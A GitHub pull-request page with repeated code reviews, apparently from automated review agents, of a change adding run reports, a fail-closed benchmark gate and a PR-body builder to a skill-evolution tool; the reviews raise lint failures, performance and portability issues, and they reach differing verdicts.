evaluate_report() accepts require_constraints: bool = True but benchmark_gate.py main() has no corresponding --require-constraints/--no-require-constraints flag. Users cannot disable that gate from the CLI. Consider adding @click.option("--no-require-constraints", "require_constraints", is_flag=True, default=True) or document the intentional omission.
4. describe_source_availability eagerly runs full ingestion
describe_source_availability calls importer_cls.extract_messages() (reading potentially 100 MB+ Copilot session files) to count candidates. The old dry-run did the same thing, so this is no worse than before — but the function name implies a lightweight check. A future improvement would be a fast count_candidates() method that short-circuits after a configurable limit.
5. cost_estimate is never passed from evolve_skill.py
write_run_report accepts cost_estimate: Optional[dict] but evolve_skill.py never passes it, so the report always writes "cost_estimate": null. The --max-cost-increase gate then produces a failure message if that threshold is set. This is safe by design (fail-closed), but worth a comment or a follow-up issue.
6. _importer_registry() captures HISTORY_PATH at call time
The registry function reads ClaudeCodeImporter.HISTORY_PATH at the moment it is called. In tests this works correctly because patches are applied at the class level before calling the registry. Worth a note in the docstring that mocking must patch the class attribute, not a local variable.
7. Lazy imports inside if write_report: block
The three from evolution.core.X import Y statements inside the if write_report: block in evolve_skill.py are fine for import-time performance but make the dependency graph implicit. If these modules add heavy top-level dependencies later, the regression will be silent. Consider at minimum a module-level comment flagging the intentional lazy import.
Looks Good
- Security:
shlex.split+shell=Falsesubprocess inbenchmark_gate.pyis correct. Benchmark commands come from the CLI operator, not untrusted input, and the PR description correctly calls this out. - Fail-closed design: Missing required fields, unreadable reports, and timed-out benchmarks all result in
passed=False. This is the right default. - Source metadata provenance: The
_message()canonical schema and theEvalExamplefield additions are clean. Theto_dict()sparse-write approach (only emit non-empty metadata fields) preserves backward compatibility with old JSONL files. build_pr_textis deterministic and non-mutating by default: The guardif dry_run or (not branch and not push and not open_pr)ensures the default invocation never touches git.- Deduplication: The
seen_inputsset-based dedup after LLM scoring is a sensible addition that prevents inflated example counts from repeated session history. - Test coverage: Happy path, fail-closed, CLI exit codes, timeout behaviour, and dry-run non-mutation are all tested. The
test_source_availability_distinguishes_missing_path_from_empty_available_sourcetest is particularly well-targeted.
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — PR #55: feat: add ingestion reports and promotion gates
Verdict: Request Changes — the implementation is solid and well-tested, but a handful of issues (one correctness concern, one silent double-extraction performance trap, unused imports flagged by ruff, and a missing .gitignore entry) should be addressed before merge.
Summary
This PR implements the first auditable promotion slice from #54: canonical source metadata on ingested examples, machine-readable run reports (run_report.py), a conservative benchmark gate (benchmark_gate.py), a local-first PR body builder (pr_builder.py), and wiring in evolve_skill.py. The design is conservative (fail-closed, dry-run safe, no remote mutation by default) and the test coverage is good (11 new tests, all 150 pass).
Warnings (should be fixed before merge)
1. describe_source_availability does a full extract_messages() on every dry-run call (external_importers.py L690). For large session databases (Copilot can be 100 MB+ per the module docstring), this loads every message just to count candidates. Either pass a small limit= or add a separate lightweight count_messages() method. As-is, --dry-run can silently be very slow.
2. write_report=True default means every run writes to reports/runs/ with no cleanup policy, and that directory is not in .gitignore so reports could be accidentally committed. Absolute path strings in the report (baseline.path, optimized.path, diff.path) will also be meaningless on a different reviewer's machine. Add reports/runs/ to .gitignore or document the policy.
3. evaluate_report in evolve_skill.py (line 313) is called with no threshold arguments, so min_holdout_delta defaults to 0.0. The benchmark gate passes even when the evolved skill shows zero improvement. Expose --min-holdout-delta in evolve_skill and thread it through, or change the default to something meaningful like 0.01.
4. Unused import sys in benchmark_gate.py (line 8) — flagged by ruff check. This is new in this PR (benchmark_gate.py is new). Run ruff check --fix to clean up.
Suggestions (non-blocking)
- run_report.py L52: report_dir: Path = Path("reports/runs") is evaluated at import time. Harmless since Path objects are immutable, but unusual for a library function. Consider Path | None = None resolved inside the body.
- pr_builder.py --open-pr does not pass --base to gh pr create, so the target branch is inferred from the repo default. Document this assumption or add --base.
- No integration test covering the write_report block in evolve_skill.evolve(); the new modules are unit-tested but the wiring is not.
- _constraint_to_dict fallback dict(result) in run_report.py is a silent catch-all that could produce unexpected output if ConstraintResult changes shape.
Looks Good
- shlex.split + shell=False subprocess in benchmark_gate.py — correct shell injection prevention
- capture_output=True, timeout=benchmark_timeout_seconds per command — correct
- fail-closed on every missing required field before numeric checks — correct gate ordering
- --dry-run returns before the report block — no accidental writes
- Secret filtering unchanged and occurs before persistence
- EvalExample.from_dict correctly ignores unknown keys
- Deduplication by task_input is in the right place (after LLM scoring, before splitting)
- Test coverage for timeout, non-zero exit, missing fields, deterministic PR body, and metadata roundtrip is thorough
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — feat: add ingestion reports and promotion gates
Overall verdict: Request Changes. The implementation is solid and the direction is correct, but there are ruff lint failures that need to be cleaned up before merge (the CI workflow checks both ruff check and ruff format).
Test suite
All 150 tests pass (11 new tests for this PR, 139 pre-existing). No regressions. DSPy deprecation warnings are pre-existing and unrelated to this PR.
Critical / Blocking
None — no correctness bugs or security issues found.
Warnings (must fix before merge — CI will fail)
1. ruff check failures (10 errors, all auto-fixable)
- evolution/core/benchmark_gate.py:8 — F401:
sysimported but unused - evolution/skills/evolve_skill.py:18 — F401:
rich.panel.Panelimported but unused - evolution/skills/evolve_skill.py:21 — F401:
get_hermes_agent_pathimported but unused - evolution/skills/evolve_skill.py:24 — F401:
LLMJudgeimported but unused - evolution/skills/evolve_skill.py:24 — F401:
FitnessScoreimported but unused - evolution/skills/evolve_skill.py:78,81,124,139,192 — F541: f-strings without any placeholders (5 instances)
Fix with: ruff check --fix evolution/ && ruff format evolution/ tests/
2. ruff format failures — all 8 changed files need reformatting. The CI workflow runs ruff format --check and will fail on the current diff.
Suggestions (non-blocking)
3. require_constraints not exposed in the CLI
evaluate_report() accepts require_constraints: bool = True but benchmark_gate.py main() has no corresponding --require-constraints/--no-require-constraints flag. Users cannot disable that gate from the CLI without editing code. Consider adding the flag or documenting the intentional omission.
4. describe_source_availability eagerly runs full ingestion
The function calls importer_cls.extract_messages() (reading potentially 100 MB+ Copilot session files) to count candidates. The old dry-run did the same, so this is no worse than before — but the function name implies a lightweight check. A future improvement would be a fast count path that short-circuits after a configurable limit.
5. cost_estimate is never passed from evolve_skill.py
write_run_report accepts cost_estimate: Optional[dict] but evolve_skill.py never passes it, so every run report has "cost_estimate": null. This means --max-cost-increase will always produce a gate failure if set. Safe by design (fail-closed), but worth a comment or a follow-up issue.
6. Lazy imports inside if write_report: block
The three from evolution.core.X import Y statements inside the conditional in evolve_skill.py are fine for performance but make the dependency graph implicit. A module-level comment flagging the intentional lazy import would help future readers.
Looks Good
- Security:
shlex.split+shell=Falsesubprocess inbenchmark_gate.pyis correct. Benchmark commands come from the CLI operator, not untrusted input. - Fail-closed design: Missing required fields, unreadable reports, and timed-out benchmarks all result in
passed=False. Correct default. - Source metadata provenance: The
_message()canonical schema andEvalExamplefield additions are clean. Sparse write into_dict()preserves backward compatibility with old JSONL files. build_pr_textis deterministic and non-mutating by default: The guardif dry_run or (not branch and not push and not open_pr)is safe.- Deduplication: The
seen_inputsset-based dedup after LLM scoring is a sensible addition. - Test coverage: Happy path, fail-closed, CLI exit codes, timeout behaviour, and dry-run non-mutation are all covered. The test distinguishing missing-path from empty-available-source is well-targeted.
jarrettj
left a comment
There was a problem hiding this comment.
Code review: see inline comments and summary comment for details.
| import json | ||
| import shlex | ||
| import subprocess | ||
| import sys |
There was a problem hiding this comment.
Unused import: sys is imported but never used in this file. ruff check flags this. Remove it to keep the lint clean since this is a new file added in this PR.
| console.print(f" Run report: {report_path}") | ||
|
|
||
| if run_benchmark_gate: | ||
| gate_result = evaluate_report(report_path) |
There was a problem hiding this comment.
Gate threshold defaulting to 0.0: evaluate_report is called with no min_holdout_delta argument, so it defaults to 0.0. This means the benchmark gate passes even when the evolved skill shows zero improvement over baseline, which defeats much of the gate's purpose. Consider exposing a --min-holdout-delta flag in evolve_skill's CLI and threading it through here, or at minimum hardcode a non-zero default (e.g. 0.01) when called from the evolution pipeline.
Automated Code Review Summary (jarrettj review agent)PR: feat: add ingestion reports and promotion gates Test Results
Verdict: Request ChangesNo security issues, no correctness bugs. The single blocker is CI-breaking lint. Blocker (CI will fail)Ruff lint and format failures across all 8 changed files. Fix with: Specific issues:
Non-blocking Suggestions
Positive Notes
|
| statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0)) | ||
| continue | ||
| try: | ||
| candidate_count = len(importer_cls.extract_messages()) |
There was a problem hiding this comment.
Performance: full extraction on dry-run: describe_source_availability calls importer_cls.extract_messages() (no limit) just to count candidates. For Copilot sessions this can be 100 MB+ of JSONL per the class docstring. This makes --dry-run unexpectedly slow and does redundant work since build_dataset_from_external will call extract_messages() again afterwards. Consider passing limit=1000 (or similar small cap) here, or adding a dedicated lightweight count_messages() method.
| import json | ||
| import shlex | ||
| import subprocess | ||
| import sys |
There was a problem hiding this comment.
F401: import sys is unused — this will fail CI (ruff check). Remove it.
| "timestamp": timestamp, | ||
| "target": {"type": target_type, "name": target_name}, | ||
| "baseline": { | ||
| "path": str(baseline_path), |
There was a problem hiding this comment.
Absolute paths in report reduce portability: baseline.path, optimized.path, and diff.path store absolute local paths. When a reviewer on a different machine opens the report, these paths are meaningless. Consider storing relative paths from the report directory (e.g. Path(baseline_path).relative_to(report_dir)) or at least documenting that paths are machine-local.
| @click.option("--max-cost-increase", default=None, type=float) | ||
| @click.option("--benchmark-command", multiple=True, help="Optional benchmark command parsed with shlex; non-zero exit fails the gate") | ||
| @click.option("--benchmark-timeout-seconds", default=300, type=int, show_default=True, help="Per-command timeout for benchmark commands") | ||
| def main(report_path: Path, min_holdout_delta: float, max_artifact_growth: float, max_cost_increase: float | None, benchmark_command: tuple[str, ...], benchmark_timeout_seconds: int): |
There was a problem hiding this comment.
The require_constraints parameter in evaluate_report() has no corresponding CLI flag here. A user who wants to skip constraint gating from the command line cannot do so. Consider adding --no-require-constraints or document this as intentional.
| optimized_score=avg_evolved, | ||
| elapsed_seconds=elapsed, | ||
| report_dir=Path(report_dir), | ||
| ) |
There was a problem hiding this comment.
cost_estimate is not passed here, so run reports always contain "cost_estimate": null. This means --max-cost-increase on the gate will always produce a failure ("missing required cost estimate for max cost increase gate"). Safe by design (fail-closed), but worth a comment or follow-up issue so the intent is clear.
Review Summary — PR #55: feat: add ingestion reports and promotion gatesVerdict: REQUEST_CHANGES All 150 tests pass locally (including the 11 new tests added in this PR). Ruff found 4 unused imports (sys in benchmark_gate.py is new; others are pre-existing in evolve_skill.py). What this PR does
Issues that need addressing before merge
Non-blocking suggestions
Looks good
|
jarrettj
left a comment
There was a problem hiding this comment.
Code Review: feat: add ingestion reports and promotion gates (PR #55)
Reviewed by: Claude Sonnet 4.6 (automated review via API)
Review date: 2026-05-16
Files reviewed: 8 (3 new modules, 5 modified files, 2 new test files)
Lines: +615 / -46
Summary
This PR implements the first auditable promotion slice from issue #54. The implementation is well-structured, the safety posture is conservative, and the test coverage is thorough. The PR can be approved with the notes below.
CRITICAL
None.
WARNINGS
1. Unused import sys in benchmark_gate.py (line 8)
sys is imported but never used in benchmark_gate.py. The module uses raise SystemExit(1) (not sys.exit(1)), which doesn't require sys. This should be removed to avoid confusion and keep the import list clean.
2. Subprocess injection risk is mitigated but the attack surface note deserves documentation
benchmark_commands is parsed with shlex.split() and run without shell=True — this is correct. However, anyone who calls evaluate_report(report_path, benchmark_commands=[...]) programmatically rather than through the CLI could pass unsafe input. The function docstring should note that callers are responsible for sanitizing benchmark_commands before passing them in, since shlex.split only prevents shell metacharacter injection but does not prevent running arbitrary local binaries.
3. describe_source_availability calls importer_cls.extract_messages() with no limit
In external_importers.py, describe_source_availability() calls importer_cls.extract_messages() (no limit arg) on potentially very large history files just to count candidates. For a user with years of Copilot history this could be slow and memory-hungry in a dry-run context. Consider passing limit=1000 or streaming a count instead.
4. run_report.py stores absolute paths in the report JSON
baseline.path, optimized.path, and diff.path are recorded as absolute filesystem paths. These will be useless (or misleading) when the report JSON is moved to another machine or shared with a reviewer. Consider storing paths relative to report_dir instead.
SUGGESTIONS
5. EvalExample.to_dict() silently drops falsy metadata
The metadata dict update uses if v — this means message_role="" would be omitted, but it would also silently drop a legitimate timestamp="0" or project="/". Using if v is not None (or explicitly listing the optional fields) is more defensive.
6. Deduplication in build_dataset_from_external is O(n) string hashing on task_input
The dedup loop uses the full task_input string as a dict key. For long inputs (up to 2000 chars) this works correctly but may be worth a brief comment explaining why exact-string dedup is preferred over fuzzy dedup here.
7. pr_builder.py hard-codes python -m pytest tests/ -q in the PR body
The test plan command in build_pr_text is always python -m pytest tests/ -q, regardless of the project structure. Consider reading this from the report or making it configurable, so downstream forks with different test runners don't get a misleading test plan.
8. _constraint_to_dict in run_report.py has a fragile fallback
dict(result) as a fallback for non-dataclass ConstraintResult objects will raise TypeError if the object is not dict-constructible. A safer fallback is vars(result) or a check for __dict__.
9. benchmark_gate.py CLI does not expose --require-constraints flag
The evaluate_report() function accepts require_constraints: bool = True but the CLI does not expose a --no-require-constraints flag. This means the flag can only be used programmatically. If the intent is that constraint-checking is always mandatory from the CLI (belt-and-suspenders), this is fine — but it should be documented.
LOOKS GOOD
- Fail-closed semantics are consistent throughout: missing required fields, parse errors, and command timeouts all produce
passed=False. This is the right default for a promotion gate. shlex.split+shell=Falseprevents shell injection from benchmark commands. The empty-argv guard (if not argv) is also present.- Secret patterns in
_contains_secretcover the most common credential formats including AWS, Anthropic, OpenAI, GitHub, Slack, and Notion tokens. There.IGNORECASEflag is appropriate. _message()canonical schema factory is a clean improvement over the inline dicts it replaces — single definition, all callers forced to provideextraction_reason.describe_source_availabilitydistinguishes missing path from empty source — this is an important UX improvement that the tests explicitly verify.write_run_reportis idempotent-safe —report_dir.mkdir(parents=True, exist_ok=True)handles pre-existing directories.- SHA-256 hashing is streamed in 1 MiB chunks — correct for large files.
- Test coverage is comprehensive: roundtrip serialization, canonical metadata emission, dry-run CLI output, gate pass/fail/timeout, PR body determinism, and git non-mutation verification.
prepare_pris correctly guarded behindrun_benchmark_gatepass — the gate failure path setsprepare_pr = False, preventing automated PR creation on regressed evolution runs.--write-report/--no-write-reportdefault is True — this is the right default; users who want to opt out can pass--no-write-reportbut the common path produces auditable artifacts.
Decision: COMMENT (PR is already merged; findings are for post-merge tracking)
The PR is solid. Items 1–4 are worth addressing in a follow-up; items 5–9 are minor style/robustness suggestions.
Automated Review Summary — PR #55 (feat: add ingestion reports and promotion gates)Reviewed: 8 files | +615 / -46 lines | 2 new test files with 8 test cases Result: APPROVE with follow-up suggestionsNo blockers found. The implementation is well-structured with correct security posture (fail-closed gates, Post-merge action items (tracked in the full review above):
Full structured review: #55 (review) |
jarrettj
left a comment
There was a problem hiding this comment.
Hermes Agent Review — PR #55
Verdict: 💬 Comment (non-blocking — two warnings, one coverage gap)
Checked out locally as pr-55. All 11 new tests pass. Security posture is clean.
✅ Looks Good
- Fail-closed gate:
benchmark_gate.pyreturnsGateResult(False, ...)on any missing required field, unreadable report, or non-zero benchmark exit — exactly right. - Non-mutating defaults:
pr_builder.pyprints by default; network mutation requires explicit--push/--open-pr. shlex.split()+shell=False: benchmark subprocess path is safe against injection.- Secret filtering preserved in all three extraction paths after the
_message()refactor. schema_version: 1in report JSON — good forward-compat hygiene.- Canonical
_message()helper eliminates 6 scattered ad-hoc dicts, guaranteeing consistent schema.
⚠️ Warnings / 💡 Suggestions
See inline comments:
external_importers.py:690—extract_messages()called without limit in dry-run availability checkrun_report.py:26—hasattr(__dataclass_fields__)vsdataclasses.is_dataclass()test_issue54_promotion.py— dedup loop inbuild_dataset_from_externalhas no test coverage
| statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0)) | ||
| continue | ||
| try: | ||
| candidate_count = len(importer_cls.extract_messages()) |
There was a problem hiding this comment.
extract_messages() is called without a limit here. For a Copilot session directory with thousands of events, this availability check during --dry-run could be noticeably slow. Consider importer_cls.extract_messages(limit=1) if you only need to confirm the path is readable and parseable — or document the trade-off in the docstring. It's only the dry-run path, so not a hot path, but it can surprise users on large session histories.
|
|
||
|
|
||
| def _constraint_to_dict(result: ConstraintResult) -> dict: | ||
| if hasattr(result, "__dataclass_fields__"): |
There was a problem hiding this comment.
💡 Suggestion: hasattr(result, '__dataclass_fields__') relies on a CPython implementation detail rather than the public dataclasses API. Prefer import dataclasses; dataclasses.is_dataclass(result) — it's the documented way to test this and handles inheritance correctly (e.g. a non-dataclass subclass of a dataclass still passes is_dataclass).
| result = CliRunner().invoke(main, ["--report", str(report_path), "--dry-run"]) | ||
| assert result.exit_code == 0 | ||
| assert "Improve demo via self-evolution" in result.output | ||
| assert calls == [] |
There was a problem hiding this comment.
💡 Coverage gap: The dedup loop added in build_dataset_from_external (lines 471–477 of external_importers.py) has no test. A small fixture with two messages sharing the same task_input fed through filter_and_score — asserting len(examples) == 1 — would cover it with minimal effort. Not blocking, but easy to add.
jarrettj
left a comment
There was a problem hiding this comment.
Hermes Agent Review — PR #55: ingestion reports and promotion gates
Checked out locally and read all 8 changed files. Solid slice — the fail-closed gate design is correct, the secret filtering is consistent, and test coverage is thorough. Two warnings worth tracking before a future re-open; nothing blocking.
✅ Looks Good
- Fail-closed gate throughout — missing fields, unreadable report, timeout, non-zero exit all produce
passed=False. Correct default. - shlex.split() + shell=False for benchmark commands — no injection surface.
- Secret filtering applied consistently before any message is stored, across all three importers.
_importer_registry()refactor eliminates the triplicateddictliteral cleanly.SourceAvailabilitydataclass gives a clean, typed boundary for dry-run reporting — distinguishes missing path from empty-but-reachable source as required by #54.- Dedup by exact
task_inputmatch after relevance filtering is simple and safe. pr_builder.pylocal-first by default — remote mutation is fully opt-in behind flags.- Test coverage — happy path, CLI exit codes, timeout, gate failure, PR body determinism all tested.
⚠️ Warnings
1. reports/runs/ not in .gitignore
Every evolution run writes timestamped .json + .diff artifacts under reports/runs/ (the write_run_report default). That directory is absent from .gitignore, so run artifacts will surface in git status and risk accidental commits. The PR description calls these local artifacts — they should be gitignored consistently with datasets/**/*.jsonl and snapshots/.
2. --run-benchmark-gate in evolve_skill.py always uses hardcoded defaults
When --run-benchmark-gate is passed to evolve_skill.py, the call is evaluate_report(report_path) with no configuration — min_holdout_delta=0.0, max_artifact_growth=0.5, no benchmark commands, default timeout. There is no way to pass gate thresholds through the evolve_skill CLI; callers who want real thresholds must invoke benchmark_gate.py separately. The flag works but is less useful than it appears. Consider either exposing the key thresholds as --gate-min-holdout-delta options, or documenting that the integrated gate uses conservative defaults only.
💡 Suggestions
describe_source_availability: clarify available=True, candidate_count=0 semantics
When a path exists but yields zero messages, the function returns available=True, candidate_count=0. This is the correct design (it distinguishes missing path from empty source), but a downstream consumer seeing that combination may wonder why no data was produced. A short docstring note — "available=True means the path is reachable; candidate_count=0 means no extractable messages were found" — would prevent confusion without changing the API.
Reviewed by Hermes Agent — branch pr-55 checked out locally, full diff read, security scan clean.
| console.print(f" Run report: {report_path}") | ||
|
|
||
| if run_benchmark_gate: | ||
| gate_result = evaluate_report(report_path) |
There was a problem hiding this comment.
evaluate_report(report_path) is called with no gate configuration — min_holdout_delta, max_artifact_growth, and benchmark_commands all use their library defaults (0.0, 0.5, none). The --run-benchmark-gate flag works but provides no way to tighten the thresholds from the evolve_skill CLI. Consider exposing --gate-min-holdout-delta etc., or document that this integrated call always uses conservative defaults.
|
📁 Follow-up note: |
|
🔧 Inline suggestion for gate_result = evaluate_report(report_path)
Consider either:
|
jarrettj
left a comment
There was a problem hiding this comment.
Hermes Agent Review — PR #55: feat: add ingestion reports and promotion gates
Verdict: 💬 Comment (non-blocking) — clean implementation with good safety properties; two warnings and two suggestions below.
Tests: All 11 new tests pass locally (11 warnings are DSPy deprecation notices, not from this PR).
✅ Looks Good
- Fail-closed design in
benchmark_gate.py— missing required fields always fail, never silently pass. shlex.split()+shell=Falsefor benchmark commands — correct subprocess hygiene, no injection surface._importer_registry()DRYs up the previously duplicated three-importer dict acrossbuild_dataset_from_externaland the dry-run path.- Non-mutative defaults throughout:
pr_builder.pyprints to stdout unless--branch/--push/--open-prare explicitly passed. SourceAvailability.availablecorrectly means reachable, not non-empty — the candidate_count carries the emptiness signal separately. Right semantics.- Dedup pass in
build_dataset_from_external()is a good defensive addition (task-input keyed set, O(n)). - Sidecar
.diffalongside the.jsonreport is a nice human-readable artifact.
⚠️ Warnings
pr_builder.py:595 — git checkout -B silently resets an existing branch
-B creates-or-resets. If a caller accidentally supplies the name of an existing branch that already has commits, those commits are silently discarded. Safer to use -b (which fails if the branch exists) and let the caller handle the conflict, or at minimum document the clobber behaviour.
run_report.py — each artifact file is read twice
_sha256(path) reads in binary; the diff generation reads in text. For large artifacts those are two full traversals. Precomputing both in a single pass (or storing the text read for the diff) would halve the I/O — low priority now but worth noting before artifacts grow.
💡 Suggestions
pr_builder.py:527 — build_pr_text() has no programmatic error guard
The Click CLI enforces exists=True so the CLI entry point is safe. But build_pr_text() is also called directly from evolve_skill.py. A bare json.loads(Path(report_path).read_text()) will raise FileNotFoundError or json.JSONDecodeError with no context for the caller. A try/except that re-raises with the path in the message would help debugging.
test_issue54_promotion.py — two paths not covered
write_run_report(cost_estimate=...)is never exercised; the cost gate branch inbenchmark_gate.pyIS tested but the cost field isn't written by the test fixture, so the cost_estimate serialization path inrun_report.pyhas no coverage.pr_builder.py --branchflag: the_run_gitcall path is tested via monkeypatch in the dry-run test, but the branch-creation + push + open-pr path is never invoked even with mocks.
Reviewed by Hermes Agent — branch checked out at pr-55, tests run locally
| from pathlib import Path | ||
|
|
||
| import click | ||
|
|
There was a problem hiding this comment.
git checkout -B silently resets an existing branch rather than failing. If a caller accidentally reuses an existing branch name, those commits are discarded without error. Consider git checkout -b (fail-if-exists) or document the clobber behaviour explicitly.
Code Review SummaryVerdict: 💬 Comment (non-blocking)
|
Code Review Summary — feat: add ingestion reports and promotion gates (PR #55)
What this PR doesIntroduces an end-to-end auditable promotion pipeline for self-evolution runs:
Verdict: COMMENT (no blocking issues, several improvements worth addressing)🔴 CriticalNone.
|
Hermes Agent Review — PR #55: feat: add ingestion reports and promotion gatesChecked out locally as
|
Summary
Implements the first auditable promotion slice requested in #54:
reports/runs/with hashes, sizes, split/source counts, constraints, holdout deltas, and sidecar diffsbenchmark_gate.pywith fail-closed required-field checks, thresholds, optional benchmark commands, per-command timeouts, and structured JSON outputpr_builder.pyfor deterministic PR title/body generation with no remote mutation by defaultevolve_skill.pyto optionally write reports, run the gate, and prepare a local PR body artifactSafety / promotion behavior
--dry-runremains non-mutative.pr_builder.pyonly mutates git/remotes behind explicit branch/push/open flags.shlex, executed withoutshell=True, and bounded by--benchmark-timeout-seconds.Test Plan
pytest tests/core/test_issue54_ingestion.py tests/core/test_issue54_promotion.py -qpytest -qResult: 150 passed, 11 warnings (DSPy deprecation warnings only).
Closes #54